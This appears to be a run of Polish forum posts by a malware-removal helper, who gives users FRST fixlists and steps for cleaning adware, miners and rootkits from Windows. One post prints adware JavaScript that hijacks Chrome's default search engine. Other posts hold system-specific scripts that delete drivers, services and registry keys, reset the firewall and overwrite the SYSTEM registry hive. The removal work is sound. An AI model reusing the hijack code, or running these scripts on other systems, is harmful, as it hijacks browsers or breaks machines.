picasso

Zabrakło pliku FRST Addition, doczep. 1. Wg Fixlog prawie wszystko elegancko usunięte z jednym wyjątkiem. Hotspot wygląda na odinstalowany (wg śladów w FRST.txt, brak Addition potwierdzającego to), ale nadal widzę rozszerzenie Hotspot Shield VPN Free Proxy – Unblock Sites w Chrome. Omyłkowo pominąłeś czy go nie widzisz na liście rozszerzeń? 2. Drobne działania poboczne, tzn. usunięcie pustych skrótów widzianych w Shortcut.txt i kwarantann narzędzi. Uruchom FRST, z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battlefield Hardline RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenVPN RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sony RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare RemoveDirectory: C:\Users\Darek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line RemoveDirectory: C:\Users\Darek\Downloads\FRST-OlderVersion StartBatch: del /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics\Farming Simulator 15\Play Farming Simulator 15 (x64).lnk" del /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics\Farming Simulator 15\Play Farming Simulator 15 (x86).lnk" del /q "C:\Users\Darek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Bloody5.lnk" del /q "C:\Users\Darek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TeamSpeak 3 Client.lnk" del /q "C:\Users\Darek\AppData\Roaming\Microsoft\Windows\Start Menu\BlueStacks.lnk" del /q "C:\Users\Darek\Documents\Euro Truck Simulator 2\readme.rtf.lnk" EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Dostarcz wynikowy fixlog.txt. Mam też pytanie czy instalacja AutoCAD 2016 działa? W raportach stanowczo zbyt dużo wpisów notujących brak plików, pomimo że program figuruje na liście zainstalowanych.

Szkoda, że nie widziałam tego tematu wcześniej, to szybko by poszło usuwanie. drmkpro64 to znany rootkit blokujący programy podpisane cyfrowo. Jest potrzebna specjalna niepodpisana cyfrowo wersja narzędzia usuwającego, orientowana na infekcje rootkit. 1. Uruchom specjalną wersję Malwarebytes Anti-rootkit. Wykonaj skan i usuwanie. Dostarcz log końcowy narzędzia. 2. Następnie zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut.

Logi z przestarzałego OTL w ogóle nie są tu brane pod uwagę, usuwam. Zabrakło za to trzeciego obowiązkowego raportu FRST Shortcut. Problem generuje adware w Harmonogramie: Task: {BFF311F5-F661-4B11-9945-B3D76D3DBD64} - System32\Tasks\yocoursenewsnetjhgs => Chrome.exe yocoursenews.net/jhgs <==== UWAGA Masz też zainstalowany program miernej reputacji Hotspot Shield 6.0.4. Wersja darmowa generuje przekierowania i reklamy: KLIK. Przy okazji będą czyszczone szczątki po programach i aktualizacji z Windows 7 do 10. Działania do przeprowadzenia: 1. Klawisz z flagą Windows+X > Programy i funkcje > odinstaluj Hotspot Shield 6.0.4. Następnie otwórz Chrome i w Rozszerzeniach odinstaluj Hotspot Shield VPN Free Proxy – Unblock Sites. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: GroupPolicy: Ograniczenia - Chrome <======= UWAGA GroupPolicy\User: Ograniczenia <======= UWAGA HKU\S-1-5-21-511756095-493730230-178181468-1000\Software\Microsoft\Internet Explorer\Main,Start Page = HKU\S-1-5-21-511756095-493730230-178181468-1000\...\Policies\Explorer: [] HKU\S-1-5-21-511756095-493730230-178181468-1000\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_3A28731608BE3B1B1AB1BA9CD2FD08D4" HKU\S-1-5-21-511756095-493730230-178181468-1000\...\StartupApproved\Run: => "AMDDVR" HKU\S-1-5-18\...\Run: [script_fcbd] => "D:\Programy\Far Cry 3 Blood Dragon\fcbd.bat" HKLM\...\StartupApproved\StartupFolder: => "fcbd.bat" HKLM-x32\...\Run: [] => [X] Tcpip\..\Interfaces\{82b17876-3e2d-49f3-8399-60a2902367ff}: [DhcpNameServer] 89.233.43.71 91.239.100.100 S3 BstHdAndroidSvc; "C:\Program Files (x86)\BlueStacks\HD-Service.exe" BstHdAndroidSvc Android [X] S2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [X] S3 BstHdPlusAndroidSvc; "C:\Program Files (x86)\BlueStacks\HD-Plus-Service.exe" BstHdPlusAndroidSvc Android [X] S2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [X] S2 CodeMeter.exe; C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe [X] S3 HnGSteamService; D:\SteamLibrary\steamapps\common\Heroes & Generals\hngservice.exe [X] S3 OpenVPNService; "C:\Program Files\OpenVPN\bin\openvpnserv.exe" [X] S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X] S2 amdacpksd; \??\C:\WINDOWS\system32\drivers\amdacpksd.sys [X] S2 BstHdDrv; \??\C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [X] S2 BstkDrv; \??\C:\Program Files (x86)\BlueStacks\BstkDrv.sys [X] U3 idsvc; Brak ImagePath U3 wpcsvc; Brak ImagePath ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku CustomCLSID: HKU\S-1-5-21-511756095-493730230-178181468-1000_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> D:\Programy\Nowy folder (2)\AutoCAD 2016\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-511756095-493730230-178181468-1000_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> D:\Programy\Nowy folder (2)\AutoCAD 2016\acad.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-511756095-493730230-178181468-1000_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> D:\Programy\Nowy folder (2)\AutoCAD 2016\acad.exe /Automation => Brak pliku CustomCLSID: HKU\S-1-5-21-511756095-493730230-178181468-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> D:\Programy\Nowy folder (2)\AutoCAD 2016\en-US\acadficn.dll => Brak pliku Task: {023AA27A-3A54-4C30-B58A-A887C8CA4389} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {2644D489-0CF7-4B04-BF29-F5BF9D18D549} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {288E3856-5273-448E-A68D-4994DE5B2EB8} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {33C14721-ACAC-4FB1-8169-B2CAB3BF1D6A} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> Brak pliku <==== UWAGA Task: {3C710460-9150-4DFE-88B7-85FA8423A089} - System32\Tasks\{8CED52AA-FB6F-4179-B949-EC3663E7C022} => pcalua.exe -a "C:\Program Files (x86)\Youtube AdBlock\uninstall.exe" Task: {40EFBFD4-016B-48E2-B8C3-4B4F1159E3A2} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {5068A5DF-A3B8-48D8-8184-E7DB8BE04BD8} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {5E0197E0-0B07-4B13-B8E4-C2F264A88B50} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA Task: {5F8C9063-F618-4F6F-AB5F-8B3D51687DAC} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe Task: {63D845BB-FB1C-43F2-868E-BC9FF7C1484B} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {695559B3-3A3B-419F-8061-AF529D46917B} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: {7075E855-2824-4BBC-A77C-E57878B9B1F1} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe Task: {711E75E2-FBD9-4815-A646-A69D3A7B99A4} - \Microsoft\Windows\Setup\gwx\rundetector -> Brak pliku <==== UWAGA Task: {75C795FE-06AF-4B35-A904-37DD34498807} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {787FBB1B-47BB-4FEF-B620-863D5C8CBEEF} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {7AF8A9B9-7AF9-494C-B539-47D291277647} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe Task: {7C607B05-2F2B-437C-9A02-CD24D8149CB3} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe Task: {7FCD7235-A847-43B2-89DD-FB2941D57766} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA Task: {86B8D89F-0E93-4521-81C7-74F0D3AEF415} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe Task: {8FE16D08-F8EF-4628-A198-9EB316E31DF7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {959F8243-FCD5-48FE-A172-BE3CB5F1C8F7} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe Task: {9D6801A2-8304-40F8-88DF-8968604F491F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {9FAC9D96-BDE1-49DF-8997-7A5443EBF440} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe Task: {B7C6A81F-556F-4354-B645-CB932FEEA0D0} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {B968F33F-6742-4162-8085-4FFB31F93E42} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK Task: {BFE91675-8F75-412B-8A3A-14808CCD0590} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe Task: {BFF311F5-F661-4B11-9945-B3D76D3DBD64} - System32\Tasks\yocoursenewsnetjhgs => Chrome.exe yocoursenews.net/jhgs <==== UWAGA Task: {CB241A5C-12C9-4AC2-93A7-05A9B4868B50} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {CCA68BEB-300B-45CF-AA84-F0AE01A4B5AA} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe Task: {CF01E53B-8498-4DC8-84D5-DAB01D481458} - System32\Tasks\{00CADB98-FD7A-4B92-A661-669FBBA34590} => Chrome.exe hxxp://ui.skype.com/ui/0/7.21.0.100/pl/abandoninstall?page=tsProgressBar Task: {D704CA20-8E32-4FE6-93EA-53FD70284219} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {DBFE4768-67C5-48A7-B9D0-641C553E18A5} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe Task: {DD70211F-D7BB-40C0-A82D-D8B65C2948E6} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> Brak pliku <==== UWAGA Task: {E1631652-5E76-4C34-B780-E6AEA7A93364} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe Task: {ED7EFA8B-EA87-4A0E-8451-8DC2AAE40257} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {F3A3AD5F-A6FF-4B64-B873-F0304E73227D} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe Task: {F4137ADA-D8AF-471E-AE1F-3987E5D09311} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe Task: {F4693630-A628-4D2D-9581-5D6614435291} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe Task: {F61856C4-0C35-4FDF-8CD3-D947BBD69D3D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {F9C826A3-E66C-44DE-8D0F-B1B8963EB7D4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe Task: {FBABB958-B2C5-488B-B1F0-9FCEA7410030} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe Task: {FDF473CB-F543-452F-BAD0-6EE363C6FFAC} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\ProgramData\hash.dat C:\ProgramData\SoftwareUpdateTemp.xml C:\Users\Darek\AppData\Local\*.* C:\Users\Darek\AppData\Local\{*} C:\Windows\ehome C:\Windows\System32\Tasks\Microsoft\Windows\Media Center CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym polem Shortcut. Dołącz też plik fixlog.txt.

Skrypt uruchomiłeś wielokrotnie, każdy skrypt jest jednorazowego użytku i nie wykona ponownie tych samych akcji. Wszystko zrobione. Na koniec zastosuj DelFix. To wszystko.

Dzięki za pliki. Wszystko jasne. To nie nowy trik, tylko tu użyty w nowym kontekście (blokada wyszukiwarki). Adware zmodyfikowało globalny plik zasobów C:\Program files (x86)\Google\Chrome\Application\[wersja]\resources.pak wstawiając skrypt ustawiający "domyślną wyszukiwarkę" w sposób permanentny: //Yrrehs is here var default_search_engine_name = 'mystarting123',default_search_engine_keywords = 'mystarting123',url = 'http://www.mystarting123.com/search/index.php?z=2edce67d80ffd74f08dc489gbz5tfw3qfw9g8o4z2q&q=%s';var index = (this.defaultsList_.dataModel.length + this.othersList_.dataModel.length - 1);var alreay_exists = false;for (var i = 0; i < this.defaultsList_.dataModel.length; ++i) {if (this.defaultsList_.dataModel.array_[i].name === default_search_engine_name) {index = i;alreay_exists = true;break;}}for (var i = 0; i < this.othersList_.dataModel.length && !alreay_exists; ++i) {if (this.othersList_.dataModel.array_[i].name === default_search_engine_name) {index = i + this.defaultsList_.dataModel.length;alreay_exists = true;break;}}if (alreay_exists) {chrome.send('managerSetDefaultSearchEngine', [index]);} else {chrome.send('editSearchEngine', [String(-1)]);chrome.send('searchEngineEditCompleted', [default_search_engine_name, default_search_engine_keywords, url]);chrome.send('managerSetDefaultSearchEngine', [index]);}}, }; . Ta modyfikacja jest niewykrywalna przez FRST i nie będzie. Już dawno temu zgłaszałam adware modyfikujące resources.pak i niestety nie było możliwe dodać detekcję. By to wyleczyć, albo szuka się poprzedniej poprawnej kopii pliku (np. via Shadow Explorer), albo reinstaluje przeglądarkę (tu już zrobione). Czyli nic więcej nie trzeba tu robić pod tym kątem, a ja wszystko już wiem.

Niestety wykonałeś nie te instrukcje co należy, czyli usunięte przeze mnie (napisane przez Miszel). Powodem usunięcia było ominięcie kupy szkodliwych usług. Przywróciłam post, bo teraz nie ma sensu temat. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: S2 DirectX11b; C:\ProgramData\DirectX11b\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] R2 Framework; C:\ProgramData\WindowsSQL\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] S2 MinerGate; C:\ProgramData\Framework\System.exe [8192 2016-02-17] () [brak podpisu cyfrowego] C:\ProgramData\Framework C:\ProgramData\DirectX11b C:\ProgramData\MicrosoftCOM C:\ProgramData\WindowsSQL Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Dostarcz wynikowy fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut.

Sterownik SWDUMon został pomyślnie usunięty za pomocą skryptu FRST, ale został przywrócony. Przyjrzałam się bliżej raportom co go przywraca. Ten sterownik należy do: AVG Driver Updater (x32 Version: 2.2.2 - AVG Netherlands B.V) Hidden Task: {7BA60D47-7384-4A38-8418-E8F039EA4AAF} - System32\Tasks\AVG Driver Updater Scan => C:\Program Files (x86)\AVG Driver Updater\AVG Driver Updater.exe [2016-08-10] (AVG Netherlands B.V) AVG Driver Updater to rebrand programu Slimware Driver Updater, co wyjaśnia wspólny sterownik. Pytaniem jest czy ten program jest sprawny i uruchamia się, oraz czy w interfejsie AVG widać jakieś opcje jego deinstalacji. Nie da się go po prostu odinstalować przez Panel sterowania (program ukryty) bez dodatkowych operacji.

W innym temacie wykryłam, że modyfikacja siedzi w globalnym pliku resources.pak. Konieczna reinstalacja Google Chrome. Przy deinstalacji zaznacz opcję Usuń także dane przeglądarki, by pozbyć się też zdefektowanego profilu.

Kopiowanie danych spod RE niestety jest mozolne, albo komendy w cmd albo trik z otworzeniem Notatnika i posłużenienie się mini eksploratorem w dialogu otwierania plików ustawionym na "Wszystkie pliki" (ale ukrytych plików ten eksplorator nie widzi).

Następnym razem proszę nie podejmuj się akcji spoza zadanej puli działań, bo występują utrudnienia. Niestety odinstalowałeś Google Chrome uniemożliwiając mi diagnozę usterki w Chrome. Reinstalacja Chrome zostałaby podana pewnie potem (i jestem przekonana, że po niej wyszukiwarka nie wraca). Ale nie o to tu mi chodziło. Informacja gdzie konkretnie siedzi ta blokada jest mi potrzebna, bo może uda się to dodać do detekcji narzędzi. Są punkty Przywracania systemu, czyli kopie poprzednich katalogów Google powinno się dać wyłuskać do analizy. Uruchom ShadowExplorer, wybierz datę odpowiadającą temu punktowi gdy Chrome jeszcze było w systemie: 21-06-2017 08:42:16 Restore Point Created by FRST Przekopiuj poniższe foldery na Pulpit: C:\Program Files (x86)\Google C:\Users\user\AppData\Local\Google C:\Users\user\AppData\Roaming\Google Spakuj do ZIP, shostuj gdzieś i podaj link.

Na wszelki wypadek wykonaj jeszcze skan SFC: KLIK. I nie widzę możliwości manewru: w raporcie FRST brak konkretów, punkty Przywracania systemu niedostępne, użycie kopii RegBack nie pomogło. Klaruje się reinstalacja systemu.

Po pierwsze, strona Google domyślnie działa już tylko w systemie https a nie http. To co jest tu nie w porządku to fakt, że wklepując te adresy bez prefiksu https nie zostajesz automatycznie przekierowany przez przeglądarkę na wariant z https tylko dostajesz błąd otwierania http (co jest spodziewane). Ten problem w teorii się rozwiązuje poprzez rekonfigurację niektórych preferencji Firefoxa, ale: Masz starą wersję przeglądarki: Mozilla Firefox 45.0.1 (x86 pl) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 pl)) (Version: 45.0.1 - Mozilla) Najnowsza to Firefox 54. Zacznij od instalacji najnowszej wersji.

Jeśli na pewno te katalogi są puste, to dostarcz więcej danych do analizy. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: Folder: C:\Windows\PolicyDefinitions Zip: C:\Program Files (x86)\Google;C:\Users\user\AppData\Local\Google Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Na Pulpicie powstał też plik data_czas.zip. Shostuj go gdzieś i podaj link do paczki.

Może to właśnie coś nie tak z tym plikiem w oryginalnej lokalizacji, stąd problem z rozruchem? Sprawdź czy da radę wykonać kopiowanie ręcznie: Restart komputera i wejdź do opcji RE. Nie uruchamiaj FRST, gdyż on montuje tymczasowo pliki rejestru i nastąpi konflikt w "użyciu". W Wierszu polecenia RE upewnij się za pomocą komendy notepad jakie jest mapowanie dysku z Windows. Następnie wklep poniższą komendę, pod X podstawiając stosowną literę: copy /y X:\Windows\System32\config\RegBack\SYSTEM X:\Windows\System32\config\SYSTEM

Wszystko zrobione. Kończymy: Zastosuj DelFix, a następnie wyczyść foldery Przywracania systemu: KLIK.

Wyniki z obu narzędzi zostaną usunięte hurtem przy udziale jednego skryptu FRST. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f DeleteKey: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f DeleteKey: HKLM\SOFTWARE\WOW6432Node\Elex-tech DeleteKey: HKLM\SOFTWARE\WOW6432Node\ScreenShot DeleteKey: HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\csastats DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\ICSW1.23 DeleteKey: HKCU\Software\One System Care DeleteKey: HKCU\Software\PRODUCTSETUP DeleteKey: HKCU\SOFTWARE\Classes\https DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\ac1f1114_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\b1b34855_0 DeleteKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BDC6D552-7F73-4130-B342-1DB676DE23E0} DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Bagsarah\Application\chrome.exe DeleteValue: HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Bagsarah RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\Elex-tech RemoveDirectory: C:\Users\Barteczek\AppData\Roaming\SSMgre RemoveDirectory: C:\Windows\system32\log StartBatch: del /q C:\Windows\system32\drivers\iSafeKrnlBoot.sys del /q C:\Windows\system32\drivers\iSafeNetFilter.sys EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. I proszę potwierdź, że w Chrome na liście wyszukiwarek adware już nie figuruje.

Spróbuj użyć inną kopię zapasową, czyli RegBack: 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: LastRegBack: 2017-06-19 19:11 Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik umieść w tym samym folderze skąd uruchamiasz FRST. Uruchom FRST i klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Jeśli Windows się uruchomi, zrób cały zestaw raportów FRST. Niektóre elementy co dopiero usunięte za pomocą skryptu FRST oraz prawdopodobnie kupa śmieci z gałęzi SOFTWARE + SYSTEM usuniętych AdwCleaner wróci.

Niepożądane wątki o ComboFix wycięte. Ani to program do rozwiązywania takich spraw, ani nie jest obsługiwany na Windows 10 (i dobrze). Problem generują zadania Microsoft Office: Task: {08B2180A-FC07-4193-B8AA-97D703CAB39C} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Task: {38F6B75A-5444-403C-BDA6-817D1BE2A7B6} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-05-31] () Więcej informacji tutaj: KLIK. Klawisz z flagą Windows + R > taskschd.msc > rozwiń gałąź Office i wyłącz oba zadania. PS. A w spoilerze wątek poboczny, tzn. usuwanie pustych wpisów głównie po aktualizacji z Windows 7 do Windows 10 oraz kilku pustych skrótów.

Tak sądziłam. Pozostaje więc użycie punktu Przywracania systemu sprzed usterki (starsze niż 19 czerwca). FRST wylicza następujące punkty: ==================== Punkty Przywracania systemu ========================= Data punktu przywracania: 2017-06-07 20:10 Data punktu przywracania: 2017-06-11 20:04 Data punktu przywracania: 2017-06-19 18:10 Data punktu przywracania: 2017-06-19 18:17 Data punktu przywracania: 2017-06-19 18:19 Data punktu przywracania: 2017-06-19 18:28 Data punktu przywracania: 2017-06-20 11:35 Zrób Przywracanie systemu z poziomu RE. Jeśli Windows ożyje, zrób logi FRST spod Windows.

Miszel03 prowadzi temat, więc wtrącam się tutaj pod innym kątem: Jeżeli z menu ustawiłeś Google jako domyślną, a wyszukiwarka adware nadal wraca i się ustawia samoczynnie jako domyślna, to być może jest tu jakaś niewidoczna na poziomie FRST blokada. Ostatnio to notowalne zachowanie w kilku tematach, pomimo że teoretycznie polityki Google nie zostały wykryte. Na wszelki wypadek proszę skopiuj na Pulpit następujące foldery (o ile są): C:\Windows\System32\GroupPolicy C:\Windows\System32\GroupPolicyUsers C:\Windows\SysWOW64\GroupPolicy C:\Windows\SysWOW64\GroupPolicyUsers Spakuj do ZIP, shostuj gdzieś i podaj link do paczki.

Cóż, z raportu FRST nic nie wynika w kontekście problemu. Owszem, widać nadal usługi adware (i to rzekomo usuwane przez AdwCleaner), ale podobne występują w innych tematach i nie był zgłaszany taki problem - zresztą etap z logo Windows to faza ładowania sterowników, a tu nie ma nic istotnego w logu.... Poza tym, niestety raport z RE jest ograniczony, tzn. nie listuje zadań Harmonogramu. Nie pozostaje nic innego jak usunąć to co widać, by się upewnić czy to (nie)jest przyczyną. 1. Przygotuj w Notatniku plik fixlist.txt o zawartości: S2 0085711497891849mcinstcleanup; C:\Users\Tomek\AppData\Local\Temp\008571~1.EXE [883024 2017-05-26] (McAfee, Inc.) <==== UWAGA S2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) <==== UWAGA S2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [92672 2017-05-19] () <==== UWAGA S2 terana; C:\Users\Tomek\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) <==== UWAGA S2 WinSAPSvc; C:\Users\Tomek\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-05-31] () <==== UWAGA S3 aswbdisk; Brak ImagePath S4 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] HKLM-x32\...\Run: [] => [X] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy-x32: Ograniczenia - Chrome <======= UWAGA DeleteKey: HKLM\SOFTWARE\WOW6432Node\Baglook DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox C:\Program Files\Malwarebytes C:\Program Files\MK C:\Program Files (x86)\Baglook C:\Program Files (x86)\Firefox C:\Program Files (x86)\McAfee C:\Program Files (x86)\MIO C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\MailUpdate C:\ProgramData\Malwarebytes C:\ProgramData\McAfee C:\Users\Tomek\AppData\Local\background_fault 